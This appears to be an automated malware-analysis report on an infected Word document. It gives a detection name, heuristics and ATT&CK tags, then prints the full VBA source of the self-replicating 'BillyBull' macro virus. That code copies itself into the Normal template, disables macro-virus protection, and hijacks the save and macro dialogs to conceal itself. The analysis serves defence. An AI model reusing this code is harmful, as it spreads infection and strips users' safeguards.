MALICIOUS
256
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains legacy WordBasic macro markers and a VBA AutoOpen macro named 'BillyBull'. The AutoOpen subroutine attempts to export its own code to a temporary file named '~WRD000^.tmp' and then import it into either the Normal template or the active document, suggesting an attempt to establish persistence or ensure execution. This behavior is characteristic of macro-based malware designed to download and execute further stages.
Heuristics 6
-
ClamAV: Doc.Trojan.Dig-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Dig-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
dc.ReplaceLine 2, "const NStat=" & NorStat -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
pth = Environ("temp") & "\~WRD000^.tmp" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5825 bytes |
SHA-256: 08159dd86ca0dabb12da1fb5e0ff97459d9405f5fb283c001ca2037c92f61484 |
|||
|
Detection
ClamAV:
Doc.Trojan.Dig-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BillyBull"
Option Explicit
Const NStat = 1
Const VStat = 1
'Copyright © 2001 by GremMe&Zergo from dd!Actor.
'All rights reserved.
Sub AutoOpen()
RunMeAldays
Dim pth As String, i As Byte, dc As Object
Dim NInst As Boolean, AInst As Boolean
pth = Environ("temp") & "\~WRD000^.tmp"
Set dc = NormalTemplate.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "BillyBull" Then
NInst = 1
dc(i).Export pth
End If
Next i
Set dc = ActiveDocument.VBProject.VBComponents
For i = 1 To dc.Count
If dc(i).Name = "BillyBull" Then
AInst = 1
dc(i).Export pth
End If
Next i
If AInst = True And NInst = False Then Set dc = NormalTemplate
If AInst = False And NInst = True Then Set dc = ActiveDocument
If AInst = False Or NInst = False Then
dc.VBProject.VBComponents.Import pth
dc.Save
' If Mid(ActiveDocument.FullName, 2, 1) = ":" Then dc.Save
Kill pth
End If
End Sub
Sub AutoExec()
RunMeAldays
End Sub
Sub FileSave()
'On Error Resume Next
AutoOpen
' RunMeAldays
Pricol
ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
AutoOpen
' RunMeAldays
Pricol
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub ToolsOptions()
Dim dc As Object
Dim VirStat As Byte
Dim NorStat As Byte
On Error Resume Next
Options.SaveNormalPrompt = NStat
Options.VirusProtection = VStat
Dialogs(wdDialogToolsOptions).Show
Set dc = ActiveDocument.VBProject.VBComponents("BillyBull").CodeModule
If Options.SaveNormalPrompt = True Then NorStat = 1
If Options.VirusProtection = True Then VirStat = 1
dc.ReplaceLine 2, "const NStat=" & NorStat
dc.ReplaceLine 3, "const VStat=" & VirStat
Options.SaveNormalPrompt = 0
Options.VirusProtection = 0
NormalTemplate.Save
NormalTemplate.Saved = True
End Sub
Sub ToolsMacro()
Dim i As Byte, n As Integer, pth As String
Dim NInst As Boolean, AInst As Boolean, Nsav As Boolean, Asav As Boolean, res As Boolean
Dim dc As Object, dcN As Object, dcA As Object
MsgBox ("toolmacro")
On Error Resume Next
pth = Environ("temp") & "\~WRD000^.tmp"
Set dcN = NormalTemplate.VBProject.VBComponents
Set dcA = ActiveDocument.VBProject.VBComponents
Set dc = NormalTemplate.VBProject
GoSub 10
NInst = res
Set dc = ActiveDocument.VBProject
GoSub 10
AInst = res
If NInst = True Then
Set dc = dcN
GoSub 20
Nsav = NormalTemplate.Saved
NormalTemplate.Saved = 1
End If
If AInst = True Then
Set dc = dcA
GoSub 20
Asav = ActiveDocument.Saved
ActiveDocument.Saved = 1
End If
Dialogs(wdDialogToolsMacro).Show
dcN("BillyBull").CodeModule.AddFromFile pth
dcA("BillyBull").CodeModule.AddFromFile pth
dcN.CodeModule.AddFromFile pth
NormalTemplate.Saved = Nsav
dcA.CodeModule.AddFromFile pth
ActiveDocument.Saved = Asav
Kill pth
Exit Sub
10:
For i = 1 To dc.VBComponents.Count
If dc.VBComponents(i).Name = "BillyBull" Then
res = 1
dc.VBComponents(i).Export pth
End If
Next i
Return
20:
dc.Export pth
n = dc("BillyBull").CodeModule.CountOfLines
dc("BillyBull").CodeModule.DeleteLines 1, n
Return
End Sub
Sub ViewVBCode()
Dim i As Byte, j As Byte
Dim n As Integer, pth As String
Dim dc As Object, dcN As Object, dcA As Object
'If Dir("c:\autoexec.bat") <> "" Then
' If FileLen("c:\autoexec.bat") <> 777 Then
' RunMeAldays
' Pricol
' Exit Sub
' Else
'Dialogs(wdDialogToolsMacro).Show
Set dc = NormalTemplate.VBProject
' Application.VBE.MainWindow.Visible = False
Application.VBE.MainWindow.Visible = True
'NormalTemplate.VBProject.VBComponents.Import ("C:\module1.")
'NormalTemplate.VBProject.VBComponents.Item(2).Export ("qqq")
'NormalTemplate.VBProject.VBComponents.Remove (NormalTemplate.VBProject.VBComponents.Item(2))
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "BillyBull1" Then
Set dc = NormalTemplate.VBProject.VBComponents.Item(i)
n = dc.CodeModule.CountOfLines
dc.CodeModule.DeleteLines 1, n
NormalTemplate.VBProject.VBComponents.Item(i).CodeModule.InsertLines(1, "wwww") = "qq"
' NormalTemplate.VBProject.VBComponents.Remove
' NormalTemplate.VBProject.VBComponents.Remove (NormalTemplate.VBProject.VBComponents.Item(i))
End If
Next i
NormalTemplate.Saved = 1
'Set dc = NormalTemplate.VBProject.VBComponents("BillyBull").CodeModule
'For i = 1 To dc.VBComponents.Count
' If dc.VBComponents(i).Name = "BillyBull" Then
' For j = 1 To Application.VBE.Windows.Count
' Application.VBE.Windows(1).Visible = False
'' Application.VBE.Windows(j).Visible = False
' Next j
'' NormalTemplate.VBProject.VBComponents(i).VBE.Windows.
' End If
'Next i
' Application.VBE.MainWindow.Visible = True
' End If
'End If
End Sub
Sub RunMeAldays()
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.VBE.MainWindow.Visible = False
End Sub
Sub Pricol()
' ActiveDocument.PageSetup.LeftMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.RightMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.BottomMargin = InchesToPoints(2.5)
' ActiveDocument.PageSetup.TopMargin = InchesToPoints(2.5)
'
' ActiveDocument.UndoClear
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.